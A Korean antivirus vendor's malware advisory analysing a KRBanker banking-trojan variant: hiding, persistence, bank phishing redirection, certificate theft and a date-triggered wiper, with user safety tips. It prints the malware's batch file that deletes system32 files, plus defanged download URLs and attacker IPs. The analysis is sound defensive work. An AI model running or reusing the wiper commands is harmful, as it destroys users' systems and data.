분석 정보/악성코드 분석 정보

[위험]전자금융사기용 악성파일(KRBanker) 시스템 파괴 기능 탑재 (Update 06)

TACHYON & ISARC 2012. 12. 27. 23:03
1. 은폐와 시스템 파괴기능을 추가하는 악성파일


잉카인터넷 대응팀은 국내 인터넷 뱅킹 이용자를 노린 악성파일(KRBanker) 변종이 최근들어 다양한 형태로 진화하고 있다는 것을 확인하고 있다. 이번에 발견된 KRBanker 변종 악성파일의 경우 델파이 프로그램 개발자가 빌드하는 라이브러리만을 감염시키는 Induc 바이러스에 중복으로 감염된 채 배포되었다. 이것으로 보아 악성파일 제작자는 이미 Induc 바이러스에 감염된 상태에서 악성파일을 제작한 것으로 보이지만, 이미 오래전에 알려진 바이러스이므로, KRBanker 변종 제작자가 고의적으로 바이러스를 포함했을 가능성은 희박하다. 이번 악성파일의 가장 큰 변화와 주목할 점은 시스템 하위 폴더에 비정상적인 폴더를 생성해서 일반 사용자가 쉽게 접근하지 못하도록 하여 악성파일 제거 및 대응을 방해하는 방식을 새롭게 도입했다는 점과 특정시점이 되면 시스템을 파괴하는 기능을 추가해서 자신의 흔적을 제거할려는 시도를 하였다.



잉카인터넷은 2012년 12월 27일 23시경 국내 인터넷 뱅킹용 악성파일이 파괴기능을 탑재한 것이 공식 확인됨에 따라 보안경보단계 중 최고단계인 "위험" 을 발령하였다.


파괴기능 전용 KRBanker 무료 전용백신
http://pds.nprotect.com/upload_file/pds_vaccine/nProtectEAVKRBanker.exe

 


[긴급]KRBanker 새로운 변종 애플 아이콘으로 위장!
http://erteam.nprotect.com/366

[주의]KRBanker 변종 시티은행 피싱 목록 추가!
http://erteam.nprotect.com/365

[긴급]KRBanker 전자금융사기용 허위 예방 서비스로 사용자 유혹
http://erteam.nprotect.com/347

[정보]보안승급 사칭 전자금융사기 기승, 사이버 금융범죄와의 전쟁
http://erteam.nprotect.com/344

[칼럼]국내 인터넷 뱅킹 보안위협 절대 남의 일이 아니다!
http://erteam.nprotect.com/341

[주의]국내 인터넷 뱅킹용 악성파일 BHO 기능 겨냥
http://erteam.nprotect.com/340

[주의]인터넷 뱅킹 보안강화(승급) 서비스는 전자금융사기의 덫
http://erteam.nprotect.com/339

2. 시스템 파일 파괴 기능을 탑재

국내 인터넷 뱅킹용 악성파일(KRBanker)은 2012년 하반기에 들어오면서 변종이 급격히 증가하고 있다. 여러가지 수법이 동원되어 유포 중에 있으며, 그중 웹 사이트를 변조하고 각종 보안취약점을 이용해서 불특정 다수를 감염대상으로 하는 방식이 성행하고 있다.

이번에 발견된 악성파일은 일본의 특정 도메인에 악성파일이 몰래 숨겨져 있었고, 다수의 국내 사이트들 대상으로 유포되었다. 악성파일은 마치 음악파일인 mp3 파일처럼 확장자를 조작해서 추가 변종을 배포시도하기도 하였다. 

hxxp://210.(생략).32:2323/qq.exe
hxxp://210.(생략).32/temp/q/m.mp3 등외 다수

악성파일인 "qq.exe" 파일이 실행되면 시스템폴더 하위에 "muis" 이름의 폴더를 생성한다. 그리고 하위에 마침표가 포함된 비정상적인 "tempblogs." 이름의 폴더를 생성한다. 보통 폴더에는 마침표(.)를 포함할 수 없다. 이 기법은 2010년 LNK Zero-Day 공격용 악성파일이 사용했던 수법이며, 일반적인 방법으로는 폴더 내부에 접근할 수가 없다.


육안상 보여지는 폴더에는 마침표(.)가 하나로 보여지지만, 실제로는 마침표(.)가 2개 포함되어 있다. 악성파일의 실행을 종료 후에 폴더를 다음과 같이 삭제할 수 있다.

Rmdir tempblog..\ /S /Q


루트킷(Rootkit) 등 숨겨진 파일을 전문적으로 탐지하는 도구(GMER)로 확인할 경우 다음과 같이 악성파일이 숨겨져 있는 종류로 구분(적색)된다.


"tempblogs." 하위폴더에는 "tempblogs.." 폴더가 하나 더 생성되어 있고, 내부에는 "1216", "csrsses.exe", "winlogones.exe" 등의 악성파일이 숨겨져 있다. 악성파일들은 서비스에 다음과 같이 등록하여 재부팅시 자동으로 실행되도록 하며, 정상적인 "winlogon.exe", "calc.exe" 등을 통해서 작동된다.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windows Update Management Extensions
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windows Video Management Services Extensions


숙주 "csrsses.exe" 와 "winlogones.exe" 악성파일 명령으로 실행된 "winlogon.exe" 파일과 "calc.exe" 파일은 프로세스가 종료되면 서로 실행해 주는 보호역할을 각각 수행한다. 실행환경에 따라 숙주 악성파일("csrsses.exe" 와 "winlogones.exe")이 보여지는 경우도 있지만, 보통 정상적인 윈로그온(winlogon.exe)과 계산기(calc.exe) 프로세스만 보여, 악성파일이 실행 중인 것을 육안으로 파악하기 쉽지 않다.


★ 시스템 파괴 기능

악성파일은 일정기간 잠복기를 거쳐 시스템 날짜가 2013년 01월 15일 이후(01월 16일부터)가 되면 C드라이브 루트폴더에 fmatme.bat 파일을 생성하여 실행시킨다. 배치파일 내부에는 시스템 폴더의 중요 파일들을 삭제하는 명령어가 삽입되어 있다. 자체 파악한 결과 금융 피싱 사이트에 모든 개인정보를 입력하는 시점에 시스템 파괴동작이 즉시 작동되는 것을 일부 확인했다.  


변종에 따라서 2012년 12월 04일, 12월 06일, 12월 17일, 12월 25일, 12월 26일 이후 파괴기능이 작동된 악성파일도 확인된 상태이다. 이미 부팅불가 피해를 입은 사용자가 있을 것으로 예상된다.


 



배치파일 내부에는 다음과 같은 삭제명령이 포함되어 있다.

@echo off
net stop alg /y
del C:\windows\system32\hal.dll
del C:\windows\system32\*.* /q /s
del "fmatme.bat


배치파일 명령이 작동되면 시스템 파일들이 다수 삭제되어 정상적인 부팅이 불가능하게 된다. 파일이 삭제되는 모습은 사용자가 직접 볼 수는 없지만, 아래와 같이 분석도구를 통해서 삭제되는 것을 확인할 수 있다.


이렇게 시스템 파일이 삭제되면 재부팅시 다음과 같이 부팅이 되지 않는다.


상기와 같이 시스템 파일이 손상되어 부팅이 정상적으로 진행되지 않을 경우 보유하고 있는 윈도우OS (부팅)시디나 복구시디 등을 이용해서 시스템 파일을 복원하여야 정상적인 시스템 사용이 가능해 진다.

악성파일은 추가 변종을 다운로드할 수 있도록 제작되어 있으며, 국내 유명 무료 Anti-Malware 제품들의 실행을 방해(무력화)한다.

안랩 : V3LSvc.exe
네이버 : Nsavsvc.npc
이스트소프트 : AYRTSrv.aye



악성파일은 변종이 매우 다양하게 존재하며, 보통 3390.bat 파일을 추가 생성하여 사용자 몰래 "Admlnlstrator" 계정을 추가하고, 감염된 컴퓨터에 원격(RDP)으로 접속을 시도하기도 한다.

 


또한, 안랩(ahnlab.com) 홈페이지에 접속을 시도할 경우 일본의 정치관련 사이트(http://special.jimin.jp/)로 리다이렉션 시킨다. 안랩 보안제품의 설치 및 다운로드 등을 방해하기 위한 목적이다.


악성파일은 보안서비스를 방해하고, 국내 인터넷 뱅킹 사이트에 접속시 피싱사이트로 연결되도록 사용자의 인터넷 접속 현황을 감시하게 된다. 감시 대상으로는 농협, 국민은행, 우리은행, 기업은행 등이 포함되어 있다.


악성파일에 감염된 상태에서 인터넷 뱅킹 사이트에 접속할 경우 브라우저상의 도메인은 실제 사이트와 동일하지만 악성파일에 의해서 접속되는 사이트는 다음과 같이 변경된다.

http://210.196.253.163/ibk/
http://210.196.253.163/nh/
http://210.196.253.163/woori/
http://210.196.253.163/kb/

아래 화면은 실제 악성파일에 감염된 상태에 우리은행에 접속했을 때 모습이다. 실제 도메인은 정상적인 사이트처럼 보이지만 실제 우리은행에는 http://www.wooribank.com/bank.htm? 라는 주소가 존재하지 않는다. 도메인만으로는 정상과 악성여부를 판별하기 쉽지 않으므로, 각별한 주의가 필요하다.


다음 화면은 실제 피싱사이트의 IP주소로 직접 접속을 시도한 화면이다. 위에 있는 악성파일 피싱 사이트 화면과 도메인(IP주소)만 다르고 화면이 일치한다는 것을 확인할 수 있다. 



악성파일에 감염된 상태에서 국민은행, 기업은행, 우리은행, 농협 등에 접속할 경우 가짜 피싱사이트로 연결된다. 특히, 국민은행의 경우 https 등을 보여주는 등 거의 동일한 화면과 도메인으로 사용자를 유혹한다. 그런 다음에 사용자로 하여금 개인금융정보와 보안카드의 모든 번호를 입력하도록 유도한다.

012345


012345678


0123456789


012345678910


가짜 인터넷 뱅킹 사이트로 연결시 보여지는 전자서명 암호 입력화면에는 휴대폰 대신에 휴태폰 이라는 오타가 포함되어 있다. 실제 정상적인 공인인증서 화면에는 휴대폰이라고 표기되어 있다.



가짜 공인인증서 화면을 통해서 사용자 암호를 입력하도록 유도하고, 계속 암호가 틀렸다는 내용을 보여주어, 여러번 암호를 입력하도록 만든다.


공인인증서 파일과 암호는 FTP Control 기능을 이용해서 외부 서버에 업로드하게 된다.



사용자가 피싱사이트에 보안카드의 모든 번호를 입력하면, 다음과 같은 메시지를 출력하고 시스템 파괴 기능을 즉시 작동시킬 수 있다. 악성파일 제작자는 금융정보 탈취 후 흔적을 제거하기 위해서 시스템 파괴 기능을 즉시 수행하고 있는 것으로 추정된다.


더불어 악성파일은 MEW, ASPack, nSPack 등의 프로그램으로 실행압축되어 있으며, 내부적으로 Induc 바이러스에 감염된 상태로 제작되었다. Induc 바이러스는 볼랜드 델파이 프로그램 개발자들을 감염대상(SysConst.pas 라이브러리)으로 삼는데, 이것으로 보아 이번 KRBanker 변종 제작자의 컴퓨터가 Induc 바이러스에 감염되어 있다는 사실을 확인할 수 있다.

Induc 바이러스는 델파이 라이브러리인 sysconst.pas 를 먼저 감염시킨 후, 개발자가 델파이에서 실행파일을 컴파일할 때 감염된 sysconst.pas 라이브러리가 포함되는 방식을 사용한다.


국내 인터넷 뱅킹용(KRBanker) 악성파일 변종이 꾸준히 증가하고 있고, 기법도 점차 다변화되고 있는 추세이다. 인터넷 뱅킹 이용자들은 이러한 보안위협에 노출되어 예금인출 사고로 이어지지 않도록 각별한 주의가 필요하다. 특히, 최근의 전자금융 피싱사이트들은 실제 인터넷 뱅킹 사이트 디자인을 그대로 모방하여 제작하고 있기 때문에 평상시 인터넷 화면만으로 진위여부를 가리기 쉽지 않다는 점을 반드시 명심해야 한다.

또한, 최근에는 원격제어(Remote Control) 기능을 가진 악성파일(Backdoor)도 함께 배포하는 사례가 많아 공격자로 하여금 개인정보와 금융관련 정보를 실시간으로 탈취하고 외부로 유출시킬 위험성도 커지고 있다.

더불어 파괴형 KRBanker 변종은 스스로 업데이트 기능을 수행하고 있어, 꾸준한 대응이 요구되고 있다.

hxxp://222.(생략).24/update/temp/q/version.tmp
hxxp://222.(생략).24/update/temp/us/version.tmp
hxxp://222.(생략).24/update/temp/q/update.mp3

update.mp3 파일은 음악파일로 위장하고 있지만 실제는 실행형(EXE) 악성파일 변종이다.

파괴형 KRBanker 조직이 사용하는 서버별 국가이다.

악성파일 유포 : 222.187.221.24 (중국) -> 122.195.189.33 (중국)
공인인증서 탈취 : 210.216.253.167 (한국)
피싱사이트 서버 : 219.66.234.222 (일본)

추가로 파괴형 KRBanker 조직은 HTran 이라고 해서 Honker Union of China 그룹이 제작했고, 소스가 공개되어 있는 해킹도구를 사용한 정황을 포착하였다. 이 프로그램은 인터넷 트래픽을 임의의 경로로 전달하는 The Onion Router 프로그램으로 해킹과정에서 트래픽 분석을 어렵게 하기 위해서 사용된다. 공격자는 트래픽 분석을 방해하기 위한 목적으로 사용했을 것으로 추정된다.


[참고]Windows 8 환경 감염 불가능

Windows 8 환경에서 정상적으로 비정상적인 폴더를 생성하지만, 악성파일 복사본이 제대로 생성되지는 못한다. 생성된 파일은 내부에 0x00 이라는 값들로 채워진 100% 손상된 파일이 만들어지기 때문에 정상적인 감염활동을 하지 못한다.

3. 마무리

인터넷 뱅킹용 악성파일이 나날이 지능화되고 정교화되면서 단순히 인터넷 뱅킹 도메인만으로 정상 사이트라고 쉽게 단정하거나 신뢰하지 않도록 하는 보안의식이 매우 중요해 지고 있다. 전자금융 이용자들은 최근 보안위협이 급증하고 있다는 사실을 숙지하고, 인터넷 뱅킹 이용에 각별한 주의가 요망된다.

보통의 가짜 인터넷 뱅킹 사이트는 사용자의 개인정보를 과도하게 입력하도록 요구하는 것이 공통점이므로, 평상시와 다르게 요구하는 정보가 많아졌거나, 인터넷 뱅킹 사이트에 오타 등 이상한 문구 등을 발견할 경우 개인정보 입력을 중단하고, 관계 금융기관 등에 문의를 해보는 습관이 필요하다.

공인인증서 파일은 USB 이동 디스크 등에 별도 암호화하여 보관하고, 보안카드 전체 번호는 절대로 모두 입력하거나 이미지로 저장하여 별도로 보관하지 않도록 주의해야 한다.

전자금융사기 사이트의 경우 대부분 보안카드의 전체 번호를 입력하도록 요구하고 있다는 점을 반드시 명심하여야 한다. 또, 제작자들이 악성파일의 은폐와 함께 이제는 사용자의 시스템까지 파괴할려는 시도를 하고 있다는 점에서 악성파일 유입을 사전에 차단하는 것이 매우 중요해 지고 있다.

해당 악성 파일은 대부분의 금융권 사이트를 피싱 대상으로 삼고 있으며, 감염 후 인터넷 뱅킹 사이트에 접속 시 대부분의 은행 사이트와 매우 유사하게 제작된 사이트를 사용자들에게 보여주기 때문에 일반 사용자들의 경우 감염 여부를 육안상으로 손쉽게 식별해 내기는 어려울 수 있다. 때문에 이러한 악성 파일로 부터 안전한 PC 사용 및 금융권 사이트 이용을 위해서는 아래와 같은 "보안 관리 수칙"을 준수하는 등 사용자 스스로의 관심과 주의를 기울이는 것이 무엇보다 중요하다고 할 수 있겠다.

※ 보안 관리 수칙

1. 윈도우와 같은 OS 및 각종 응용 프로그램의 최신 보안 패치 생활화.

2. 신뢰할 수 있는 보안업체의 백신을 설치 후 최신 엔진 및 패턴버전으로 업데이트해 실시간 감시 기능을 항상 "ON"상태로 유지하여 사용한다.

3. 출처가 불분명한 이메일에 대한 열람 및 첨부파일에 대한 다운로드/실행을 자제한다.

4. 인스턴트 메신저, SNS 등을 통해 접근이 가능한 링크 접속시 주의


※ 잉카인터넷 대응팀에서는 위와 같은 악성파일을 포함한 각종 보안 위협에 대비하기 위해 24시간 지속적인 대응체계를 유지하고 있다.

nProtect Anti-Virus/Spyware v3.0 제품에서는 다양한 변종 악성파일을 진단/치료하고 있다.

▣ AVS 3.0 무료 설치 : http://avs.nprotect.com/